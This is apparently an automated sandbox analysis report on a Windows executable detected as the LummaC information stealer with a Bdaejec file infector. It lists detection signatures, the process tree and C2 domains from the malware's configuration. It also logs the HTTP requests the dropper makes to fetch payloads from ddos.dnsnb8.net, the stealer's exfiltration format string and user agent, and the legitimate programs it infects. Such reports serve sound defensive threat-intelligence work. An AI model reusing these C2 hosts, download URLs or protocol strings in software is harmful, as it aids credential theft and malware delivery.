
Windows Analysis Report
Lisect_AVT_24003_G1A_72.exe

Overview

General Information

Sample name:Lisect_AVT_24003_G1A_72.exe
Analysis ID:1481153
MD5:0140e8aab1d9274870495213cdf82291
SHA1:094a5f534dd47158b2e936f1c6bb8351fb3f1706
SHA256:61f30e4ff3a0f6c6b50ac05dacc8344ba3ed9911c2888a606e7c15c4ea4a469f
Tags:exe
Infos:

Detection

LummaC, Bdaejec, LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

  • System is w10x64
  • Lisect_AVT_24003_G1A_72.exe (PID: 5024 cmdline: "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_72.exe" MD5: 0140E8AAB1D9274870495213CDF82291)
    • jawuwAtX.exe (PID: 5352 cmdline: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe MD5: F7D21DE5C4E81341ECCD280C11DDCC9A)
      • WerFault.exe (PID: 1812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 1548 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}
Source: Process Memory Space: jawuwAtX.exe PID: 5352 | Rule: JoeSecurity_Bdaejec | Description: Yara detected Bdaejec | Author: Joe Security
Source: decrypted.memstr | Rule: JoeSecurity_LummaCStealer_2 | Description: Yara detected LummaC Stealer | Author: Joe Security
      No Sigma rule has matched
      No Snort rule has matched
      Timestamp:2024-07-25T04:58:13.398502+0200
      SID:2807908
      Source Port:49713
      Destination Port:799
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:58:16.407005+0200
      SID:2050861
      Source Port:51048
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:16.386793+0200
      SID:2050856
      Source Port:54832
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:20.629540+0200
      SID:2028371
      Source Port:49717
      Destination Port:443
      Protocol:TCP
      Classtype:Unknown Traffic
      Timestamp:2024-07-25T04:58:16.445372+0200
      SID:2050857
      Source Port:54220
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:17.447057+0200
      SID:2807908
      Source Port:49715
      Destination Port:799
      Protocol:TCP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:59:07.625811+0200
      SID:2022930
      Source Port:443
      Destination Port:49724
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-07-25T04:58:12.573742+0200
      SID:2838522
      Source Port:54030
      Destination Port:53
      Protocol:UDP
      Classtype:Malware Command and Control Activity Detected
      Timestamp:2024-07-25T04:58:16.431602+0200
      SID:2050859
      Source Port:54443
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:30.030977+0200
      SID:2022930
      Source Port:443
      Destination Port:49719
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:2024-07-25T04:58:16.357306+0200
      SID:2050858
      Source Port:52674
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:16.420501+0200
      SID:2050860
      Source Port:56548
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected
      Timestamp:2024-07-25T04:58:16.306584+0200
      SID:2050898
      Source Port:56995
      Destination Port:53
      Protocol:UDP
      Classtype:Domain Observed Used for C2 Detected


      AV Detection

      Source: Lisect_AVT_24003_G1A_72.exe | Avira: detected
      Source: http://ddos.dnsnb8.net:799/cj//k2.rar | URL Reputation: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rar | URL Reputation: Label: malware
      Source: http://ddos.dnsnb8.net/ | URL Reputation: Label: malware
      Source: healthproline.pro | Avira URL Cloud: Label: malware
      Source: smallrabbitcrossing.site | Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rars | Avira URL Cloud: Label: phishing
      Source: https://strainriskpropos.store/api | Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store:443/api | Avira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/apiGaX | Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/D%D | Avira URL Cloud: Label: malware
      Source: https://punchtelephoneverdi.store:443/api | Avira URL Cloud: Label: malware
      Source: https://snuggleapplicationswo.fun/ | Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarNp3 | Avira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/l | Avira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/ | Avira URL Cloud: Label: malware
      Source: https://smallrabbitcrossing.site/api | Avira URL Cloud: Label: malware
      Source: https://telephoneverdictyow.site/api | Avira URL Cloud: Label: malware
      Source: telephoneverdictyow.site | Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rar= | Avira URL Cloud: Label: phishing
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarh | Avira URL Cloud: Label: phishing
      Source: https://punchtelephoneverdi.store/ | Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/ | Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/M%s | Avira URL Cloud: Label: malware
      Source: https://punchtelephoneverdi.store/apihL | Avira URL Cloud: Label: malware
      Source: https://strainriskpropos.store/api; | Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k1.rarZ | Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarF; | Avira URL Cloud: Label: phishing
      Source: https://telephoneverdictyow.site:443/api | Avira URL Cloud: Label: malware
      Source: https://smallrabbitcrossing.site/ | Avira URL Cloud: Label: malware
      Source: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1 | Avira URL Cloud: Label: malware
      Source: snuggleapplicationswo.fun | Avira URL Cloud: Label: malware
      Source: C:\Program Files\7-Zip\Uninstall.exe | Avira: detection malicious, Label: W32/Jadtre.B
      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Avira: detection malicious, Label: W32/Jadtre.B
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Jadtre.B
      Source: Lisect_AVT_24003_G1A_72.exe.5024.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro", "strainriskpropos.stor", "telephoneverdictyow.site", "punchtelephoneverdi.stor", "smallrabbitcrossing.site", "smallrabbitcrossing.site", "snuggleapplicationswo.fun", "theoryapparatusjuko.fun", "healthproline.pro"], "Build id": "kPnM2L--LogsDillerCloud"}
      Source: ddos.dnsnb8.net | Virustotal: Detection: 12%
      Source: healthproline.pro | Virustotal: Detection: 10%
      Source: telephoneverdictyow.site | Virustotal: Detection: 21%
      Source: punchtelephoneverdi.store | Virustotal: Detection: 20%
      Source: theoryapparatusjuko.fun | Virustotal: Detection: 20%
      Source: snuggleapplicationswo.fun | Virustotal: Detection: 21%
      Source: strainriskpropos.store | Virustotal: Detection: 21%
      Source: smallrabbitcrossing.site | Virustotal: Detection: 21%
      Source: https://strainriskpropos.store:443/api | Virustotal: Detection: 18%
      Source: https://strainriskpropos.store/api | Virustotal: Detection: 18%
      Source: healthproline.pro | Virustotal: Detection: 10%
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | ReversingLabs: Detection: 92%
      Source: Lisect_AVT_24003_G1A_72.exe | Virustotal: Detection: 86%
      Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
      Source: C:\Program Files\7-Zip\Uninstall.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe | Joe Sandbox ML: detected
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Joe Sandbox ML: detected
      Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
      Source: Lisect_AVT_24003_G1A_72.exe | Joe Sandbox ML: detected
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: strainriskpropos.stor
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: telephoneverdictyow.site
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: punchtelephoneverdi.stor
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: smallrabbitcrossing.site
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: snuggleapplicationswo.fun
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: theoryapparatusjuko.fun
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: healthproline.pro
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
      Source: 00000000.00000003.2177227918.0000000001360000.00000004.00001000.00020000.00000000.sdmp | String decryptor: kPnM2L--LogsDillerCloud
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

      Spreading

      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | System file written: C:\Program Files\7-Zip\Uninstall.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_003229E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose | 2_2_003229E2
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00322B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread | 2_2_00322B8C
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

      Networking

      Source: Malware configuration extractor | URLs: strainriskpropos.stor
      Source: Malware configuration extractor | URLs: telephoneverdictyow.site
      Source: Malware configuration extractor | URLs: punchtelephoneverdi.stor
      Source: Malware configuration extractor | URLs: smallrabbitcrossing.site
      Source: Malware configuration extractor | URLs: smallrabbitcrossing.site
      Source: Malware configuration extractor | URLs: snuggleapplicationswo.fun
      Source: Malware configuration extractor | URLs: theoryapparatusjuko.fun
      Source: Malware configuration extractor | URLs: healthproline.pro
      Source: Malware configuration extractor | URLs: strainriskpropos.stor
      Source: Malware configuration extractor | URLs: telephoneverdictyow.site
      Source: Malware configuration extractor | URLs: punchtelephoneverdi.stor
      Source: Malware configuration extractor | URLs: smallrabbitcrossing.site
      Source: Malware configuration extractor | URLs: smallrabbitcrossing.site
      Source: Malware configuration extractor | URLs: snuggleapplicationswo.fun
      Source: Malware configuration extractor | URLs: theoryapparatusjuko.fun
      Source: Malware configuration extractor | URLs: healthproline.pro
      Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 799
      Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 799
      Source: global traffic | TCP traffic: 192.168.2.6:49713 -> 44.221.84.105:799
      Source: Joe Sandbox View | IP Address: 44.221.84.105 44.221.84.105
      Source: global traffic | HTTP traffic detected:
        GET /cj//k1.rar HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: ddos.dnsnb8.net:799
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /cj//k2.rar HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: ddos.dnsnb8.net:799
        Connection: Keep-Alive
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: C:\Users\user\AppData\Local\Temp\jawuwAtX.exe | Code function: 2_2_00321099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep | 2_2_00321099
      Source: global traffic | HTTP traffic detected:
        GET /cj//k1.rar HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: ddos.dnsnb8.net:799
        Connection: Keep-Alive
      Source: global traffic | HTTP traffic detected:
        GET /cj//k2.rar HTTP/1.1
        Accept: */*
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: ddos.dnsnb8.net:799
        Connection: Keep-Alive
      Source: global traffic | DNS traffic detected: DNS query: ddos.dnsnb8.net
      Source: global traffic | DNS traffic detected: DNS query: healthproline.pro
      Source: global traffic | DNS traffic detected: DNS query: theoryapparatusjuko.fun
      Source: global traffic | DNS traffic detected: DNS query: snuggleapplicationswo.fun
      Source: global traffic | DNS traffic detected: DNS query: smallrabbitcrossing.site
      Source: global traffic | DNS traffic detected: DNS query: punchtelephoneverdi.store
      Source: global traffic | DNS traffic detected: DNS query: telephoneverdictyow.site
      Source: global traffic | DNS traffic detected: DNS query: strainriskpropos.store
      Source: jawuwAtX.exe, 00000002.00000002.2235788537.0000000000323000.00000002.00000001.01000000.00000004.sdmp, jawuwAtX.exe, 00000002.00000003.2145539627.0000000000F50000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net/
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarZ
      Source: jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rars
      Source: jawuwAtX.exe, 00000002.00000002.2236447017.0000000002A4A000.00000004.00000010.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000000FBE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManager1
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarF;
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001054000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarNp3
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarh
      Source: Amcache.hve.2.dr | String found in binary or memory: http://upx.sf.net
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.activestate.com
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.activestate.comHolger
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.baanboard.com
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.baanboard.comBrendon
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.develop.com
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.develop.comDeepak
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.lua.org
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.rftp.com
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.rftp.comJosiah
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.scintilla.org
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.scintilla.org/scite.rng
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.spaceblue.com
      Source: SciTE.exe.2.dr | String found in binary or memory: http://www.spaceblue.comMathias
      Source: jawuwAtX.exe, 00000002.00000002.2236131842.0000000001022000.00000004.00000020.00020000.00000000.sdmp, jawuwAtX.exe, 00000002.00000003.2163557052.0000000001026000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://punchtelephoneverdi.store/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://punchtelephoneverdi.store/apihL
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://punchtelephoneverdi.store:443/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://smallrabbitcrossing.site/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013C9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://smallrabbitcrossing.site/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://snuggleapplicationswo.fun/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strainriskpropos.store/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strainriskpropos.store/D%D
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195660941.000000000138E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strainriskpropos.store/M%s
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195739242.00000000013BC000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strainriskpropos.store/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strainriskpropos.store/api;
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://strainriskpropos.store:443/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telephoneverdictyow.site/
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telephoneverdictyow.site/api
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192972204.00000000013C9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telephoneverdictyow.site/apiGaX
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013E1000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013E1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telephoneverdictyow.site/l
      Source: Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192640162.00000000013D8000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000002.2195829122.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Lisect_AVT_24003_G1A_72.exe, 00000000.00000003.2192469958.00000000013D5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://telephoneverdictyow.site:443/api
      Source: SciTE.exe.2.dr | String found in binary or memory: https://www.smartsharesystems.com/
      Source: SciTE.exe.2.dr | String found in binary or memory: https://www.smartsharesystems.com/Morten
      Source: SciTE.exe.2.dr | Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_6127ce1a-0

      System Summary

      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name:
      Source: Lisect_AVT_24003_G1A_72.exe | Static PE information: section name: #bu
      Source: MyProg.exe.2.dr | Static PE information: section name: Y|uR
